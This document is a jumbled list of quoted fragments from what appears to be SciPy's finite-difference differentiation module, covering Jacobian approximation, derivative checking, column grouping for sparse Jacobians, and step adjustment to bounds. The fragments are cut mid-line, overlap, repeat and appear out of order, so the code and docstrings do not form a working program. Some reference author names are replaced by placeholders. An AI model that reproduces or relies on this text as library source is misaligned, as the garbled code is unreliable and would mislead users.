np.abs(h) use_one_sided = np.zeros_like(h, dtype=bool) else: raise ValueError(\"`scheme`", "Compute finite difference approximation of derivative. Examples -------- >>> import", "if method == '2-point': def matvec(p): if np.array_equal(p, np.zeros_like(p)): return", "numpy.linalg import norm from scipy.sparse.linalg import LinearOperator from ..sparse import", "scheme. For example, 2 means that we need to evaluate", "upper_dist[forward] / num_steps backward = (upper_dist < lower_dist) & ~fitting", "zero. A greedy sequential algorithm is used to construct groups.", "0 to n_groups-1, where n_groups is the number of found", "difference method to use: - '2-point' - use the first", "of Computation 51, 1988. Examples -------- >>> import numpy as", "= x0 + h_vec dx = x - x0 df", "upper bounds on independent variables. Defaults to no bounds. Each", "with shape (n,) or None Permutation array which defines the", "ub def group_columns(A, order=0): \"\"\"Group columns of a 2-D matrix", "difference in interior points and the second order accuracy forward", "float The maximum among all relative errors for elements with", "(m, n) is returned. If `sparsity` is not None returns", ": array_like or sparse matrix of shape (m, n). A", "respect to x[j]. Parameters ---------- fun : callable Function of", "function maps from R^n to R^m, its derivatives form m-by-n", "Both empty by default. The calling signature is ``fun(x, *args,", "in one or both directions are required. In other words", "complex-step finite difference scheme. This assumes that the user function", "h_vecs[i]*1.j) df = f1.imag dx = h_vecs[i, i] else: raise", "continued to the complex plane. Otherwise, produces bogus results. rel_step", "* np.sin(c2 * x[1])] ... ]) ... >>> >>> x0", "== '3-point': # Here we do conceptually the same but", "computes Jacobian matrix of `fun`. It must work with argument", "array_like, sparse matrix, 2-tuple}, optional Defines a sparsity structure of", "= cols[j] else: raise ValueError(\"Never be here.\") # All that's", "be here.\") J_transposed[i] = df / dx if m ==", "the Jacobian matrix. If `as_linear_operator` is True returns a LinearOperator", "= f0.size n = x0.size J_transposed = np.empty((n, m)) h_vecs", "= f1.imag return df / dx else: raise RuntimeError(\"Never be", "... x[0] * np.cos(c2 * x[1])]) ... >>> def jac(x,", "interior points and the second order accuracy forward or backward", "the Jacobian matrix is known to have only few non-zero", "h, use_one_sided = _adjust_scheme_to_bounds( x0, h, 1, '2-sided', lb, ub)", "to implement finite difference scheme. For example, 2 means that", "will be the same for all variables. Use it to", "if f0.ndim > 1: raise ValueError(\"`f0` passed has more than", "2 - 1 return rel_step * sign_x0 * np.maximum(1.0, np.abs(x0))", "finite difference approximation. Parameters ---------- fun : callable Function of", "b) It clearly separates these two different cases. b) In", "order accuracy forward or backward difference. - '3-point' - use", "None then a ndarray with shape (m, n) is returned.", "Defaults to no bounds. Each bound must match the size", "same group if in each row at least one of", "matvec) def _dense_difference(fun, x0, f0, h, use_one_sided, method): m =", "to estimate derivative. h : ndarray, shape (n,) Desired finite", "the second-order accuracy in terms of Taylor expansion. Refer to", "constraints.\") if as_linear_operator: if rel_step is None: rel_step = relative_step[method]", "m = f0.size n = x0.size J_transposed = np.empty((n, m))", "al. \"Numerical Recipes. The Art of Scientific Computing. 3rd edition\",", "array_like or sparse matrix with an appropriate shape. x0 :", "sequential algorithm is used to construct groups. Parameters ---------- A", "{\"2-point\": EPS**0.5, \"3-point\": EPS**(1/3), \"cs\": EPS**0.5} def _compute_absolute_step(rel_step, x0, method):", "= x0.copy() x2 = x0.copy() mask_1 = use_one_sided & e", "`fun`. It must work with argument x the same way", "boundary, and 3-point forward or backward scheme is used for", "automatically, see Notes. f0 : None or array_like, optional If", "m=1 it is returned as a 1-D gradient array with", "False if sparsity is None: return _dense_difference(fun_wrapped, x0, f0, h,", "non-zero elements. as_linear_operator : bool, optional When True the function", "be here.\") return LinearOperator((m, n), matvec) def _dense_difference(fun, x0, f0,", "maps from R^n to R^m, its derivatives form m-by-n matrix", "(n,), on the other hand when n=1 Jacobian is returned", "'cs' - use a complex-step finite difference scheme. This assumes", "Otherwise it returns a dense array or a sparse matrix", "min_dist = np.minimum(upper_dist, lower_dist) / num_steps adjusted_central = (~central &", "ValueError(\"`A` must be 2-dimensional.\") m, n = A.shape if order", "csr_matrix with shape (m, n). For sparse matrices and linear", "as_linear_operator: if rel_step is None: rel_step = relative_step[method] return _linear_operator_difference(fun_wrapped,", "individual elements of the matrix. By default `as_linear_operator` is False.", "method == '3-point': def matvec(p): if np.array_equal(p, np.zeros_like(p)): return np.zeros(m)", "used with `order` used as a random seed. Default is", "j = cols[j] elif method == '3-point': # Here we", "elif method == 'cs': f1 = fun(x0 + h_vecs[i]*1.j) df", "return 1-D array_like of shape (m,) or a scalar. jac", "to n_groups-1, where n_groups is the number of found groups.", "of the matrix. By default `as_linear_operator` is False. args, kwargs", "a random permutation is used with `order` used as a", "it is returned as a 1-D gradient array with shape", "= f0.size n = x0.size if method == '2-point': def", "to obtain it. A single array or a sparse matrix", "None or np.isscalar(order): rng = np.random.RandomState(order) order = rng.permutation(n) else:", "... return np.array([x[0] * np.sin(c1 * x[1]), ... x[0] *", "relative_step = {\"2-point\": EPS**0.5, \"3-point\": EPS**(1/3), \"cs\": EPS**0.5} def _compute_absolute_step(rel_step,", "== '3-point': h, use_one_sided = _adjust_scheme_to_bounds( x0, h, 1, '2-sided',", "(i, j) is a partial derivative of f[i] with respect", "Each bound must match the size of `x0` or be", "= np.nonzero(e) # Find all non-zero elements in selected columns", "if issparse(A): groups = group_sparse(m, n, A.indices, A.indptr) else: groups", "``fun(x0)`` is not called. Default is None. bounds : tuple", ": ndarray, shape (n,) Upper bounds on independent variables. Returns", "`sparsity` is None then a ndarray with shape (m, n)", "sparse matrix, 2-tuple}, optional Defines a sparsity structure of the", "Finite difference method to use: - '2-point' - use the", "= np.diag(h) for i in range(h.size): if method == '2-point':", "and the same for `jac`. Returns ------- accuracy : float", "if lb.shape != x0.shape or ub.shape != x0.shape: raise ValueError(\"Inconsistent", "x[1]), c1 * x[0] * np.cos(c1 * x[1])], ... [np.cos(c2", "Restore column indices in the full array. j = cols[j]", "selected columns of Jacobian. i, j, _ = find(structure[:, cols])", "elements in each row, then it's possible to estimate its", "efficient way of computing ``J.dot(p)`` for any vector ``p`` of", "converted to a 1-D array. method : {'3-point', '2-point', 'cs'},", "for '3-point' method is selected automatically. The well-known central difference", "return csr_matrix(J) def check_derivative(fun, jac, x0, bounds=(-np.inf, np.inf), args=(), kwargs={}):", "groups. Each value ``groups[i]`` is an index of a group", "- 2 * h) scheme : {'1-sided', '2-sided'} Whether steps", "lb, ub) elif method == '3-point': h, use_one_sided = _adjust_scheme_to_bounds(", "shape (n,) Desired finite difference steps. num_steps : int Number", "x0, h, 1, '2-sided', lb, ub) elif method == 'cs':", "groups def approx_derivative(fun, x0, method='3-point', rel_step=None, f0=None, bounds=(-np.inf, np.inf), sparsity=None,", "j]).ravel() return np.max(np.abs(abs_err_data) / np.maximum(1, np.abs(J_diff_data))) else: J_diff = approx_derivative(fun,", "m-by-n matrix called the Jacobian, where an element (i, j)", "bounds on independent variables. Returns ------- h_adjusted : ndarray, shape", "h * num_steps h_adjusted = h.copy() lower_dist = x0 -", "as_linear_operator=False, args=(), kwargs={}): \"\"\"Compute finite difference approximation of the derivatives", "a function maps from R^n to R^m, its derivatives form", "of bool, shape (n,) Whether to switch to one-sided scheme.", "use_one_sided[j] df = np.empty(m) rows = i[mask] df[rows] = -3", "= fun(x) - f0 elif method == '3-point' and use_one_sided[i]:", "else: raise RuntimeError(\"Never be here.\") J_transposed[i] = df / dx", "num_steps backward = (upper_dist < lower_dist) & ~fitting h_adjusted[backward] =", "- x1[mask_2] f1 = fun(x1) f2 = fun(x2) cols, =", "# Perturb variables which are in the same group simultaneously.", "be array_like or sparse matrix with an appropriate shape. x0", "np.atleast_2d can be called to get 2-D Jacobian with correct", ": array_like of shape (n,). A column grouping for a", "the size of `x0` or be a scalar, in the", "To perform such economic computations two ingredients are required: *", "`fun`. Both empty by default. The calling signature is ``fun(x,", "from scipy.optimize import approx_derivative >>> >>> def f(x, c1, c2):", "Additional arguments passed to `fun` and `jac`. Both empty by", "h / norm(p) x = x0 + dx*p*1.j f1 =", "J_diff i, j, abs_err_data = find(abs_err) J_diff_data = np.asarray(J_diff[i, j]).ravel()", "lb, ub) elif method == 'cs': use_one_sided = False if", "= (~central & (np.abs(h_adjusted) <= min_dist)) h_adjusted[adjusted_central] = min_dist[adjusted_central] use_one_sided[adjusted_central]", "only for large Jacobian matrices where each row contains few", "return f if f0 is None: f0 = fun_wrapped(x0) else:", "dx = h / norm(p) x = x0 + dx*p*1.j", "= find(abs_err) J_diff_data = np.asarray(J_diff[i, j]).ravel() return np.max(np.abs(abs_err_data) / np.maximum(1,", "else: if not issparse(sparsity) and len(sparsity) == 2: structure, groups", "a standard dense differencing will be used. Note, that sparse", "def check_derivative(fun, jac, x0, bounds=(-np.inf, np.inf), args=(), kwargs={}): \"\"\"Check correctness", "to estimate its several columns by a single function evaluation", "0).astype(np.int32) if A.ndim != 2: raise ValueError(\"`A` must be 2-dimensional.\")", "use_one_sided relative_step = {\"2-point\": EPS**0.5, \"3-point\": EPS**(1/3), \"cs\": EPS**0.5} def", "if n_groups is significantly less than n. References ---------- ..", "rng = np.random.RandomState(order) order = rng.permutation(n) else: order = np.asarray(order)", "when n=1 Jacobian is returned with a shape (m, 1).", "step size is computed as ``h = rel_step * sign(x0)", "words '1-sided' applies to forward and backward schemes, '2-sided' applies", "def g(x): ... return x**2 if x >= 1 else", "* f1[rows] - f2[rows] rows = i[~mask] df[rows] = f2[rows]", "size of `x0` or be a scalar, in the latter", "---------- A : array_like or sparse matrix, shape (m, n)", "order is None or np.isscalar(order): rng = np.random.RandomState(order) order =", "1.0. >>> def g(x): ... return x**2 if x >=", "is ``fun(x, *args, **kwargs)`` and the same for `jac`. Returns", "see [1]_. A finite difference scheme for '3-point' method is", "np.all(np.isinf(ub))): raise ValueError(\"Bounds not supported when \" \"`as_linear_operator` is True.\")", "x1 = x0 - h_vecs[i] x2 = x0 + h_vecs[i]", "than 1 and absolute errors for elements with absolute values", "approx_derivative(fun, x0, method='3-point', rel_step=None, f0=None, bounds=(-np.inf, np.inf), sparsity=None, as_linear_operator=False, args=(),", "- 1 return rel_step * sign_x0 * np.maximum(1.0, np.abs(x0)) def", "the Institute of Mathematics and its Applications, 13 (1974), pp.", "row_indices = np.hstack(row_indices) col_indices = np.hstack(col_indices) fractions = np.hstack(fractions) J", ": int Number of `h` steps in one direction required", "bool, optional When True the function returns an `scipy.sparse.linalg.LinearOperator`. Otherwise", "x0 = np.array([1.0, 0.5 * np.pi]) >>> check_derivative(f, jac, x0,", "is computed as ``h = rel_step * sign(x0) * max(1,", "only for ``scheme='2-sided'``. \"\"\" if scheme == '1-sided': use_one_sided =", "matrix is known to have only few non-zero elements in", "It must return 1-D array_like of shape (m,) or a", "fun(x0 + h_vecs[i]*1.j) df = f1.imag dx = h_vecs[i, i]", "See Also -------- approx_derivative : Compute finite difference approximation of", "= f1.imag dx = h_vecs[i, i] else: raise RuntimeError(\"Never be", "group_columns(A, order=0): \"\"\"Group columns of a 2-D matrix for sparse", "1-D array_like of shape (m,) or a scalar. jac :", "of `fun`. It must work with argument x the same", "forward = (upper_dist >= lower_dist) & ~fitting h_adjusted[forward] = upper_dist[forward]", "use_one_sided[adjusted_central] = False return h_adjusted, use_one_sided relative_step = {\"2-point\": EPS**0.5,", "was helpful only if n_groups is significantly less than n.", "(A != 0).astype(np.int32) if A.ndim != 2: raise ValueError(\"`A` must", "ndarray of bool, shape (n,) Whether to switch to one-sided", "must be 2-dimensional.\") m, n = A.shape if order is", "use_one_sided[forward] = True backward = (upper_dist < lower_dist) & ~central", "to individual elements of the matrix. By default `as_linear_operator` is", "ub) elif method == '3-point': h, use_one_sided = _adjust_scheme_to_bounds( x0,", "row contains few non-zero elements. as_linear_operator : bool, optional When", "& ~central h_adjusted[backward] = -np.minimum( h[backward], 0.5 * lower_dist[backward] /", "x0, f0, rel_step, method) else: h = _compute_absolute_step(rel_step, x0, method)", "is the following: a) It handles a case of gradient", "raise RuntimeError(\"`fun` return value has \" \"more than 1 dimension.\")", "---------- .. [1] W. H. Press et. al. \"Numerical Recipes.", "It clearly separates these two different cases. b) In all", "a random seed. Default is 0, that is use a", "sign(x0) * max(1, abs(x0))``, possibly adjusted to fit into the", "Arbitrarily Spaced Grids\", Mathematics of Computation 51, 1988. Examples --------", "variables. ub : ndarray, shape (n,) Upper bounds on independent", "f1 = fun(x1) f2 = fun(x2) df = -3.0 *", "'%s'. \" % method) x0 = np.atleast_1d(x0) if x0.ndim >", ">>> def g(x): ... return x**2 if x >= 1", "x[i] - x0[i] # Recompute dx as exactly representable number.", "cols[j] mask = use_one_sided[j] df = np.empty(m) rows = i[mask]", "an efficient way of computing ``J.dot(p)`` for any vector ``p``", "optional Additional arguments passed to `fun`. Both empty by default.", "that's left is to compute the fraction. We store i,", "Taylor expansion. Refer to [2]_ for the formulas of 3-point", "Parameters ---------- fun : callable Function of which to estimate", "References ---------- .. [1] W. H. Press et. al. \"Numerical", "in one direction required to implement finite difference scheme. For", "* num_steps h_adjusted = h.copy() lower_dist = x0 - lb", "n = x0.size if method == '2-point': def matvec(p): if", "1 dimension.\") return f if f0 is None: f0 =", "ub.ndim == 0: ub = np.resize(ub, x0.shape) return lb, ub", "The linear operator provides an efficient way of computing ``J.dot(p)``", "groups = group_dense(m, n, A) groups[order] = groups.copy() return groups", "i, j and # fractions as separate arrays and later", "permutation but guarantee repeatability. Returns ------- groups : ndarray of", "rel_step is None: rel_step = relative_step[method] return _linear_operator_difference(fun_wrapped, x0, f0,", "is likely that your `jac` implementation is correct. See Also", "must match the size of `x0` or be a scalar,", "= x0.size if method == '2-point': def matvec(p): if np.array_equal(p,", "import group_dense, group_sparse EPS = np.finfo(np.float64).eps def _adjust_scheme_to_bounds(x0, h, num_steps,", "passed to `fun`. Both empty by default. The calling signature", "approximation of the derivatives of a vector-valued function. If a", "economic computations two ingredients are required: * structure : array_like", "seed. Default is 0, that is use a random permutation", "no bounds. Each bound must match the size of `x0`", "step. use_one_sided : ndarray of bool, shape (n,) Whether to", "1 dimension.\") if np.any((x0 < lb) | (x0 > ub)):", "method) else: h = _compute_absolute_step(rel_step, x0, method) if method ==", "x0, args=(1, 2)) 2.4492935982947064e-16 \"\"\" J_to_test = jac(x0, *args, **kwargs)", "'2-sided': central = (lower_dist >= h_total) & (upper_dist >= h_total)", "issparse(J_to_test): J_diff = approx_derivative(fun, x0, bounds=bounds, sparsity=J_to_test, args=args, kwargs=kwargs) J_to_test", "with an appropriate shape. x0 : array_like of shape (n,)", "R^n to R^m, its derivatives form m-by-n matrix called the", "equals to zero. * groups : array_like of shape (n,).", "Step size decreases only if a sign flip or switching", "f2[rows] rows = i[~mask] df[rows] = f2[rows] - f1[rows] elif", "np.resize(ub, x0.shape) return lb, ub def group_columns(A, order=0): \"\"\"Group columns", "a 1-D array. method : {'3-point', '2-point', 'cs'}, optional Finite", "m = f0.size n = x0.size if method == '2-point':", "in range(n_groups): # Perturb variables which are in the same", "h, use_one_sided h_total = h * num_steps h_adjusted = h.copy()", "used for points sufficiently far from the boundary, and 3-point", "Each value ``groups[i]`` is an index of a group to", "of the Jacobian identically equals to zero. * groups :", "zero element means that a corresponding element of the Jacobian", "limit the region of function evaluation. In the example below", "\"On the estimation of sparse Jacobian matrices\", Journal of the", "= fun(x0 + h_vec*1.j) df = f1.imag dx = h_vec", "{'1-sided', '2-sided'} Whether steps in one or both directions are", "if order is None or np.isscalar(order): rng = np.random.RandomState(order) order", "elements. as_linear_operator : bool, optional When True the function returns", "``p`` of shape (n,), but does not allow direct access", "\" % method) x0 = np.atleast_1d(x0) if x0.ndim > 1:", "x0 if scheme == '1-sided': x = x0 + h_total", "fun(x2) df = f2 - f1 return df / dx", "with absolute values higher than 1 and absolute errors for", "if method not in ['2-point', '3-point', 'cs']: raise ValueError(\"Unknown method", "dtype=bool) elif scheme == '2-sided': h = np.abs(h) use_one_sided =", "few non-zero elements in each row, then it's possible to", "Returns ------- groups : ndarray of int, shape (n,) Contains", "columns enumeration. If int or None, a random permutation is", "a sum of truncation and round-off errors, see [1]_. A", "* sign(x0) * max(1, abs(x0))``, possibly adjusted to fit into", "than n. References ---------- .. [1] <NAME>, <NAME>, and <NAME>,", "and its Applications, 13 (1974), pp. 117-120. \"\"\" if issparse(A):", "* h) or f(x0 - 2 * h) scheme :", "depending on how `sparsity` is defined. If `sparsity` is None", "order accuracy forward or backward difference near the boundary. -", "and `jac`. Both empty by default. The calling signature is", "import numpy as np >>> from scipy.optimize import approx_derivative >>>", ": ndarray, shape (n,) Lower bounds on independent variables. ub", "== 'cs': f1 = fun(x0 + h_vec*1.j) df = f1.imag", "2-D matrix for sparse finite differencing [1]_. Two columns are", "np.abs(h) use_one_sided = np.zeros_like(h, dtype=bool) else: raise ValueError(\"`scheme` must be", "then step is selected automatically, see Notes. f0 : None", "columns of a 2-D matrix for sparse finite differencing [1]_.", "Jacobian identically equals to zero. * groups : array_like of", "is False. args, kwargs : tuple and dict, optional Additional", "- J_diff i, j, abs_err_data = find(abs_err) J_diff_data = np.asarray(J_diff[i,", "the region of function evaluation. In the example below we", "it assigned to ``EPS**(1/s)``, where EPS is machine epsilon for", "x0, f0, h, use_one_sided, method) else: if not issparse(sparsity) and", "n_groups = np.max(groups) + 1 for group in range(n_groups): #", "b in bounds] if lb.ndim == 0: lb = np.resize(lb,", "the full array. j = cols[j] elif method == '3-point':", "LinearOperator with shape (m, n). Otherwise it returns a dense", "groups[order] = groups.copy() return groups def approx_derivative(fun, x0, method='3-point', rel_step=None,", "then a ndarray with shape (m, n) is returned. If", "x the same way as `fun`. The return value must", "= np.zeros_like(h, dtype=bool) else: raise ValueError(\"`scheme` must be '1-sided' or", "- x0[mask_1] dx[mask_2] = x2[mask_2] - x1[mask_2] f1 = fun(x1)", "variables which are in the same group simultaneously. e =", "array or a sparse matrix depending on `sparsity`. The linear", "a shape (n,), on the other hand when n=1 Jacobian", "if x >= 1 else x ... >>> x0 =", "x0 + h_vecs[i] dx = x2[i] - x1[i] f1 =", "way of computing ``J.dot(p)`` for any vector ``p`` of shape", "far from the boundary, and 3-point forward or backward scheme", "return value has \" \"more than 1 dimension.\") return f", "A : array_like or sparse matrix, shape (m, n) Matrix", "n. References ---------- .. [1] <NAME>, <NAME>, and <NAME>, \"On", "partial derivative of f[i] with respect to x[j]. Parameters ----------", "= True backward = (upper_dist < lower_dist) & ~central h_adjusted[backward]", "for '2-point' method and s=3 for '3-point' method. Such relative", "f1 = fun(x) df = f1.imag return df / dx", "raise RuntimeError(\"Never be here.\") return LinearOperator((m, n), matvec) def _dense_difference(fun,", "used to construct groups. Parameters ---------- A : array_like or", "have at most 1 dimension.\") lb, ub = _prepare_bounds(bounds, x0)", "with argument x the same way as `fun`. The return", "elif method == '3-point' and not use_one_sided[i]: x1 = x0", "in the same group if in each row at least", "np.zeros(m) dx = 2*h / norm(p) x1 = x0 -", "np.ravel(J_transposed) return J_transposed.T def _sparse_difference(fun, x0, f0, h, use_one_sided, structure,", "an appropriate shape. x0 : array_like of shape (n,) or", "for ``scheme='2-sided'``. \"\"\" if scheme == '1-sided': use_one_sided = np.ones_like(h,", "= group_columns(sparsity) if issparse(structure): structure = csc_matrix(structure) else: structure =", "``fun(x, *args, **kwargs)``. Returns ------- J : {ndarray, sparse matrix,", "= f2 - f1 elif method == 'cs': f1 =", "\"\"\"Compute finite difference approximation of the derivatives of a vector-valued", "* x[1]), -c2 * x[0] * np.sin(c2 * x[1])] ...", "= group_sparse(m, n, A.indices, A.indptr) else: groups = group_dense(m, n,", "if issparse(structure): structure = csc_matrix(structure) else: structure = np.atleast_2d(structure) groups", "args=(1, 2)) array([[ 1., 0.], [-1., 0.]]) Bounds can be", "# fractions as separate arrays and later construct coo_matrix. row_indices.append(i)", "fun(x1) f2 = fun(x2) cols, = np.nonzero(e) i, j, _", "Difference Formulas on Arbitrarily Spaced Grids\", Mathematics of Computation 51,", "2-tuple of array_like, optional Lower and upper bounds on independent", "x0, f0, h, use_one_sided, structure, groups, method): m = f0.size", "points sufficiently far from the boundary, and 3-point forward or", "= i[mask] df[rows] = -3 * f0[rows] + 4 *", "points and the second order accuracy forward or backward difference", ">>> check_derivative(f, jac, x0, args=(1, 2)) 2.4492935982947064e-16 \"\"\" J_to_test =", "linear operator provides an efficient way of computing ``J.dot(p)`` for", "x1 = x0 - (dx/2)*p x2 = x0 + (dx/2)*p", "single function evaluation [3]_. To perform such economic computations two", "at point 1.0. >>> def g(x): ... return x**2 if", "kwargs={}): \"\"\"Check correctness of a function computing derivatives (Jacobian or", "and can be analytically continued to the complex plane. Otherwise,", "fun(x2) cols, = np.nonzero(e) i, j, _ = find(structure[:, cols])", "0.5 * np.pi]) >>> check_derivative(f, jac, x0, args=(1, 2)) 2.4492935982947064e-16", "Adjusted step sizes. Step size decreases only if a sign", "repeatability. Returns ------- groups : ndarray of int, shape (n,)", "in a conventional way. b) It clearly separates these two", "a given sparsity structure, use `group_columns` to obtain it. A", "# variables. cols, = np.nonzero(e) # Find all non-zero elements", "ignored. If None (default) then step is selected automatically, see", "return groups def approx_derivative(fun, x0, method='3-point', rel_step=None, f0=None, bounds=(-np.inf, np.inf),", "as_linear_operator : bool, optional When True the function returns an", "= np.atleast_1d(fun(x, *args, **kwargs)) if f.ndim > 1: raise RuntimeError(\"`fun`", "maximum among all relative errors for elements with absolute values", "Bounds checking is not implemented when `as_linear_operator` is True. sparsity", "latter case the bound will be the same for all", "_adjust_scheme_to_bounds( x0, h, 1, '2-sided', lb, ub) elif method ==", "function computing derivatives (Jacobian or gradient) by comparison with a", "is 0, that is use a random permutation but guarantee", "these two different cases. b) In all cases np.atleast_2d can", "int, shape (n,) Contains values from 0 to n_groups-1, where", "sign of `h` is ignored. If None (default) then step", "matvec(p): if np.array_equal(p, np.zeros_like(p)): return np.zeros(m) dx = h /", "numerical differentiation.\"\"\" from __future__ import division import numpy as np", "provides an efficient way of computing ``J.dot(p)`` for any vector", "less or equal than 1. If `accuracy` is on the", "difference near the boundary. - 'cs' - use a complex-step", "**kwargs)) if f.ndim > 1: raise RuntimeError(\"`fun` return value has", "1-D array_like of shape (m,) or a scalar. x0 :", ": {None, array_like, sparse matrix, 2-tuple}, optional Defines a sparsity", "matrix. If `as_linear_operator` is True returns a LinearOperator with shape", "one-sided # and two-sided schemes. x1 = x0.copy() x2 =", "Applications, 13 (1974), pp. 117-120. .. [3] <NAME>, \"Generation of", "empty by default. The calling signature is ``fun(x, *args, **kwargs)``", "evaluation. In the example below we compute left and right", "between bounds and `x0`.\") if as_linear_operator and not (np.all(np.isinf(lb)) and", ">>> import numpy as np >>> from scipy.optimize import approx_derivative", "rows = i[~mask] df[rows] = f2[rows] - f1[rows] elif method", "RuntimeError(\"Never be here.\") return LinearOperator((m, n), matvec) def _dense_difference(fun, x0,", "finite difference approximation of the derivatives of a vector-valued function.", "has zero. A greedy sequential algorithm is used to construct", "absolute values less or equal than 1. If `accuracy` is", "A[:, order] if issparse(A): groups = group_sparse(m, n, A.indices, A.indptr)", "for any vector ``p`` of shape (n,), but does not", "forward and backward schemes, '2-sided' applies to center schemes. lb", "point 1.0. >>> def g(x): ... return x**2 if x", "rel_step : None or array_like, optional Relative step size to", "hand when n=1 Jacobian is returned with a shape (m,", "lb.shape != x0.shape or ub.shape != x0.shape: raise ValueError(\"Inconsistent shapes", "into the bounds. For ``method='3-point'`` the sign of `h` is", "edition\", sec. 5.7. .. [2] <NAME>, <NAME>, and <NAME>, \"On", "f1 = fun(x0 + h_vecs[i]*1.j) df = f1.imag dx =", "to limit the region of function evaluation. In the example", "scalar. jac : callable Function which computes Jacobian matrix of", "dimension.\") return f if f0 is None: f0 = fun_wrapped(x0)", "j, _ = find(structure[:, cols]) j = cols[j] else: raise", "the derivatives. The argument x passed to this function is", "doesn't allow to take a full step. use_one_sided : ndarray", "Float will be converted to 1-D array. bounds : 2-tuple", "and right derivative at point 1.0. >>> def g(x): ...", "The argument x passed to this function is ndarray of", ">= lower_dist) & ~fitting h_adjusted[forward] = upper_dist[forward] / num_steps backward", "the derivatives of a vector-valued function. If a function maps", "any vector ``p`` of shape (n,), but does not allow", "(n,) Lower bounds on independent variables. ub : ndarray, shape", "differencing makes sense only for large Jacobian matrices where each", "= x0 + dx*p*1.j f1 = fun(x) df = f1.imag", "A.indptr) else: groups = group_dense(m, n, A) groups[order] = groups.copy()", "right derivative at point 1.0. >>> def g(x): ... return", "lower_dist) & ~central h_adjusted[backward] = -np.minimum( h[backward], 0.5 * lower_dist[backward]", "is an index of a group to which ith column", "m=1 Jacobian is returned with a shape (n,), on the", "if in each row at least one of them has", "if m=1 it is returned as a 1-D gradient array", "'2-sided'} Whether steps in one or both directions are required.", "if np.any((x0 < lb) | (x0 > ub)): raise ValueError(\"`x0`", "1 else x ... >>> x0 = 1.0 >>> approx_derivative(g,", "structure of the Jacobian matrix. If the Jacobian matrix is", "import numpy as np >>> from scipy.optimize import check_derivative >>>", ">>> from scipy.optimize import approx_derivative >>> >>> def f(x, c1,", "(~central & (np.abs(h_adjusted) <= min_dist)) h_adjusted[adjusted_central] = min_dist[adjusted_central] use_one_sided[adjusted_central] =", "**kwargs)``. Returns ------- J : {ndarray, sparse matrix, LinearOperator} Finite", "of shape (m,) or a scalar. jac : callable Function", "for elements with absolute values less or equal than 1.", "size decreases only if a sign flip or switching to", "optional Relative step size to use. The absolute step size", "------- h_adjusted : ndarray, shape (n,) Adjusted step sizes. Step", "~fitting h_adjusted[forward] = upper_dist[forward] / num_steps backward = (upper_dist <", "raise ValueError(\"Bounds not supported when \" \"`as_linear_operator` is True.\") def", "np.hstack(col_indices) fractions = np.hstack(fractions) J = coo_matrix((fractions, (row_indices, col_indices)), shape=(m,", "use_one_sided[backward] = True min_dist = np.minimum(upper_dist, lower_dist) / num_steps adjusted_central", "rel_step * sign(x0) * max(1, abs(x0))``, possibly adjusted to fit", "n). Otherwise it returns a dense array or sparse matrix", "__future__ import division import numpy as np from numpy.linalg import", "sizes. Step size decreases only if a sign flip or", "x1[mask_2] -= h_vec[mask_2] x2[mask_2] += h_vec[mask_2] dx = np.zeros(n) dx[mask_1]", "if f.ndim > 1: raise RuntimeError(\"`fun` return value has \"", "return J_transposed.T def _sparse_difference(fun, x0, f0, h, use_one_sided, structure, groups,", "\"3-point\": EPS**(1/3), \"cs\": EPS**0.5} def _compute_absolute_step(rel_step, x0, method): if rel_step", "* f0 + 4 * f1 - f2 elif method", "pp. 117-120. \"\"\" if issparse(A): A = csc_matrix(A) else: A", "only if n_groups is significantly less than n. References ----------", "use_one_sided, structure, groups, method): m = f0.size n = x0.size", "direction required to implement finite difference scheme. For example, 2", "args=args, kwargs=kwargs) abs_err = np.abs(J_to_test - J_diff) return np.max(abs_err /", "n = A.shape if order is None or np.isscalar(order): rng", "'2-sided'.\") if np.all((lb == -np.inf) & (ub == np.inf)): return", "np.pi]) >>> check_derivative(f, jac, x0, args=(1, 2)) 2.4492935982947064e-16 \"\"\" J_to_test", "returns a LinearOperator with shape (m, n). Otherwise it returns", "= _adjust_scheme_to_bounds( x0, h, 1, '2-sided', lb, ub) elif method", "[] n_groups = np.max(groups) + 1 for group in range(n_groups):", "== '1-sided': x = x0 + h_total violated = (x", "[-1., 0.]]) Bounds can be used to limit the region", "the same way as `fun`. The return value must be", "= ub - x0 if scheme == '1-sided': x =", "perturbed # variables. cols, = np.nonzero(e) # Find all non-zero", "h_adjusted[backward] = -np.minimum( h[backward], 0.5 * lower_dist[backward] / num_steps) use_one_sided[backward]", "A = np.atleast_2d(A) A = (A != 0).astype(np.int32) if A.ndim", "its Applications, 13 (1974), pp. 117-120. .. [3] <NAME>, \"Generation", "f0, h, use_one_sided, method) else: if not issparse(sparsity) and len(sparsity)", "fractions.append(df[i] / dx[j]) row_indices = np.hstack(row_indices) col_indices = np.hstack(col_indices) fractions", "need to evaluate f(x0 + 2 * h) or f(x0", "array or a sparse matrix is interpreted as a sparsity", "finite difference steps. num_steps : int Number of `h` steps", "computation (m=1) in a conventional way. b) It clearly separates", "raise ValueError(\"Unknown method '%s'. \" % method) x0 = np.atleast_1d(x0)", "and two-sided schemes. x1 = x0.copy() x2 = x0.copy() mask_1", "- lb upper_dist = ub - x0 if scheme ==", "difference scheme. For example, 2 means that we need to", "or None Permutation array which defines the order of columns", "The well-known central difference scheme is used for points sufficiently", "... return np.array([ ... [np.sin(c1 * x[1]), c1 * x[0]", "> 1: raise ValueError(\"`x0` must have at most 1 dimension.\")", "not issparse(sparsity) and len(sparsity) == 2: structure, groups = sparsity", "ub) fitting = np.abs(h_total) <= np.maximum(lower_dist, upper_dist) h_adjusted[violated & fitting]", "shape (n,), but does not allow direct access to individual", "returned as a 2-D structure, for ndarrays, if m=1 it", "selected automatically, see Notes. f0 : None or array_like, optional", "np >>> from scipy.optimize import approx_derivative >>> >>> def f(x,", "h_adjusted[adjusted_central] = min_dist[adjusted_central] use_one_sided[adjusted_central] = False return h_adjusted, use_one_sided relative_step", "sparsity groups = group_columns(sparsity) if issparse(structure): structure = csc_matrix(structure) else:", "e = np.equal(group, groups) h_vec = h * e if", "relative errors for elements with absolute values higher than 1", "h_vec dx = x - x0 df = fun(x) -", "1., 0.], [-1., 0.]]) Bounds can be used to limit", "is None: rel_step = relative_step[method] sign_x0 = (x0 >= 0).astype(float)", "a random permutation but guarantee repeatability. Returns ------- groups :", "than 1 dimension.\") if np.any((x0 < lb) | (x0 >", "derivatives. Float will be converted to a 1-D array. method", "for '3-point' method. Such relative step approximately minimizes a sum", "`h` steps in one direction required to implement finite difference", ".. [1] <NAME>, <NAME>, and <NAME>, \"On the estimation of", "not supported when \" \"`as_linear_operator` is True.\") def fun_wrapped(x): f", "x0, method) if method == '2-point': h, use_one_sided = _adjust_scheme_to_bounds(", "of derivative. Examples -------- >>> import numpy as np >>>", 